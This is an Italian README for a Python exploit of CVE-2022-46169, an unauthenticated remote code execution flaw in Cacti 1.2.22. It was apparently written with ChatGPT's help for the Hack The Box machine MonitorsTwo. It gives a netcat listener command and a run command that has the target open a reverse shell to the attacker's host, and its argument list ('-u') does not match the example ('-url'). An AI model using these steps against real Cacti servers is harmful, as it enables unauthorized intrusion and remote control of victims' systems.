
Exploit per CVE-2022-46169, un'esecuzione remota di codice non autenticata in Cacti 1.2.22, che consegna una reverse shell a un host e una porta specificati.
Questo repository contiene un exploit per CVE-2022-46169, che colpisce Cacti 1.2.22. Questa vulnerabilità consente a un attaccante non autenticato di eseguire codice arbitrario sul sistema interessato.
Se desideri una descrizione dettagliata di come questo exploit è possibile, consulta questo articolo di Rapid7. Entrano in grandi dettagli sulle specifiche.
Ho scritto questo codice, con l'aiuto di chatGPT per una macchina Hack The Box chiamata MonitorsTwo a scopo educativo.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Configura un listener sulla tua macchina locale con netcat nc -lvnp 9001
Esegui l'exploit contro il target
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
Questo Proof of Concept (PoC) è inteso rigorosamente a scopo educativo e di test. Utilizzare questo PoC su qualsiasi sistema o rete senza la chiara autorizzazione del proprietario del sistema è illegale e potrebbe portare ad azioni legali. Il creatore non si assume alcuna responsabilità per eventuali danni derivanti dall'applicazione corretta o scorretta di questo PoC. Usalo a tuo rischio.